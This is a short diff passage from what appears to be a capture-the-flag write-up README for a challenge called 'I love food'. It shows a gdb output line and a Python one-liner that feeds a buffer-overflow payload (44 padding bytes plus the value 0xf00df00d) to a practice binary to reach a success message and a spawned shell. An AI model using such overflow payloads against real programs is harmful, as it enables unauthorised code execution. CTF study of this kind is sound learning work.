geoffrey-diederichs/CTF_SSI_2024/01_I_love_food/README.md

 0x0000000000000000 in ?? ()
 ```

-We can see in the stack that the variable has been modified, and by resuming execution after the breakpoint the program does reach the success message and open another process.
+The program does reach the success message and open another process.

 Let's test our payload on the binary using the intruction `(python3 -c 'import sys; sys.stdout.buffer.write(b"\x41"*44+b"\x0d\xf0\x0d\xf0")' ; tee)` to input our payload, and then freeze the shell before it closes :